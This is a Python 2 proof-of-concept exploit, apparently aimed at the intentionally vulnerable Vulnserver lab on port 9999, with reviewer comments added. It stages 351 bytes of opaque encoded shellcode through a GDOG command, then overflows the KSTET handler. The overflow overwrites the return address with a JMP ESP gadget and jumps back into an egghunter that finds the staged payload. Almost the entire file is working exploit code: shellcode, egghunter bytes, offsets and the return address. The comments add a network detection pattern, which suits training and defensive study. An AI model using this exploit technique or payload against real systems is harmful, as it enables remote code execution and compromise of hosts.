KSTET_EIP_EGGHUNTER.py
#!/usr/bin/python
# Proof-of-concept for a stack buffer overflow in a TCP service on port 9999.
# The GDOG/KSTET command names look like the intentionally vulnerable
# Vulnserver training target -- TODO confirm against the lab setup; the page
# does not name the service. Two messages are sent: the first stages a tagged
# ("egg") payload in the process's memory, the second overflows the KSTET
# handler's stack buffer, overwrites the saved return address and redirects
# execution to a 32-byte egghunter that locates the staged payload.
#
# Python 2 only (print statements, str used as a byte buffer); it will not run
# unmodified under Python 3.
#
# For defenders: the observable pattern is a 500-byte GDOG argument dominated by
# a run of 0x90 bytes, followed by a ~170-byte KSTET argument of repeated
# "A"/"C" filler. Both are anomalous for these commands and are a reasonable
# basis for a network-layer detection.
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# NOTE(review): socket.connect() returns None, so `connect` never holds a
# useful value; the binding is unused below.
connect=s.connect(('192.168.101.158',9999))
print "[*] Sending initial shellcode"
# Stage 1: GDOG command whose argument is the egg tag followed by the payload.
shellcode = "GDOG "
# Egg tag: "DINA" twice. The egghunter below carries the same four ASCII bytes.
shellcode += "DINADINA"
# Payload size: 351 bytes (27 lines x 13 bytes). Opaque encoded shellcode,
# reproduced as-is; nothing on this page says what it does when executed.
shellcode += "\xbe\x52\x2c\x7c\x53\xd9\xf6\xd9\x74\x24\xf4\x5b\x29"
shellcode += "\xc9\xb1\x52\x31\x73\x12\x83\xc3\x04\x03\x21\x22\x9e"
shellcode += "\xa6\x39\xd2\xdc\x49\xc1\x23\x81\xc0\x24\x12\x81\xb7"
shellcode += "\x2d\x05\x31\xb3\x63\xaa\xba\x91\x97\x39\xce\x3d\x98"
shellcode += "\x8a\x65\x18\x97\x0b\xd5\x58\xb6\x8f\x24\x8d\x18\xb1"
shellcode += "\xe6\xc0\x59\xf6\x1b\x28\x0b\xaf\x50\x9f\xbb\xc4\x2d"
shellcode += "\x1c\x30\x96\xa0\x24\xa5\x6f\xc2\x05\x78\xfb\x9d\x85"
shellcode += "\x7b\x28\x96\x8f\x63\x2d\x93\x46\x18\x85\x6f\x59\xc8"
shellcode += "\xd7\x90\xf6\x35\xd8\x62\x06\x72\xdf\x9c\x7d\x8a\x23"
shellcode += "\x20\x86\x49\x59\xfe\x03\x49\xf9\x75\xb3\xb5\xfb\x5a"
shellcode += "\x22\x3e\xf7\x17\x20\x18\x14\xa9\xe5\x13\x20\x22\x08"
shellcode += "\xf3\xa0\x70\x2f\xd7\xe9\x23\x4e\x4e\x54\x85\x6f\x90"
shellcode += "\x37\x7a\xca\xdb\xda\x6f\x67\x86\xb2\x5c\x4a\x38\x43"
shellcode += "\xcb\xdd\x4b\x71\x54\x76\xc3\x39\x1d\x50\x14\x3d\x34"
shellcode += "\x24\x8a\xc0\xb7\x55\x83\x06\xe3\x05\xbb\xaf\x8c\xcd"
shellcode += "\x3b\x4f\x59\x41\x6b\xff\x32\x22\xdb\xbf\xe2\xca\x31"
shellcode += "\x30\xdc\xeb\x3a\x9a\x75\x81\xc1\x4d\xba\xfe\xad\xbf"
shellcode += "\x52\xfd\x2d\xc1\x19\x88\xcb\xab\x4d\xdd\x44\x44\xf7"
shellcode += "\x44\x1e\xf5\xf8\x52\x5b\x35\x72\x51\x9c\xf8\x73\x1c"
shellcode += "\x8e\x6d\x74\x6b\xec\x38\x8b\x41\x98\xa7\x1e\x0e\x58"
shellcode += "\xa1\x02\x99\x0f\xe6\xf5\xd0\xc5\x1a\xaf\x4a\xfb\xe6"
shellcode += "\x29\xb4\xbf\x3c\x8a\x3b\x3e\xb0\xb6\x1f\x50\x0c\x36"
shellcode += "\x24\x04\xc0\x61\xf2\xf2\xa6\xdb\xb4\xac\x70\xb7\x1e"
shellcode += "\x38\x04\xfb\xa0\x3e\x09\xd6\x56\xde\xb8\x8f\x2e\xe1"
shellcode += "\x75\x58\xa7\x9a\x6b\xf8\x48\x71\x28\x52\x73\x9b\x12"
shellcode += "\xcb\xda\xce\x10\x96\xdc\x25\x56\xaf\x5e\xcf\x27\x54"
shellcode += "\x7e\xba\x22\x10\x38\x57\x5f\x09\xad\x57\xcc\x2a\xe4"
# Pad with NOPs (0x90) so that tag + payload + padding is exactly 500 bytes.
shellcode += "\x90"*(500-351)
# Service banner. NOTE(review): recv(1024) can return fewer bytes than one
# full message, or block indefinitely if the service sends nothing.
print s.recv(1024)
s.send(shellcode + '\r\n')
print s.recv(1024)
# Stage 2: KSTET command whose argument overwrites the saved return address
# (EIP) at offset 66 of the argument.
buf = 'KSTET /.:/'
# [*] Exact match at offset 66
buf += "A"*2
### Egghunter length is 32 bytes
# The immediate 44 49 4e 41 on the second line is the ASCII tag "DINA". The
# staged buffer carries the tag twice, so presumably the hunter looks for the
# doubled tag before transferring control -- confirm by disassembling.
buf += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c"
buf += "\x05\x5a\x74\xef\xb8\x44\x49\x4e\x41\x89\xd7\xaf\x75"
buf += "\xea\xaf\x75\xe7\xff\xe7"
# Filler so the next 4 bytes land exactly at offset 66 (2 + 32 + 32).
buf += "A"*(66-32-2)
#buf += "B"*4
# 625011AF JMP ESP
# Return-address overwrite, little-endian encoding of 0x625011AF; per the
# comment above this is a JMP ESP gadget (module not named on this page).
buf += "\xaf\x11\x50\x62"
# EB BA is a short relative jump with displacement 0xBA (-70); it is expected
# to land inside the egghunter above -- confirm the landing address in a
# debugger rather than trusting the arithmetic.
buf += "\xEB\xBA" # Jump Back
# Trailing filler; the argument totals 2 + 32 + 32 + 4 + 2 + 98 = 170 bytes.
buf += "C"*(100-2)
# NOTE(review): the message says TRUN but this buffer exercises KSTET; the
# runtime string is left unchanged here, but it will mislead anyone reading
# console output or logs.
print "Fuzzing TRUN with %s bytes" % len(buf)
s.send(buf + '\r\n')
print s.recv(1024)
# NOTE(review): close() only runs if nothing above raised; a failed connect or
# send leaves the socket open until interpreter exit.
s.close()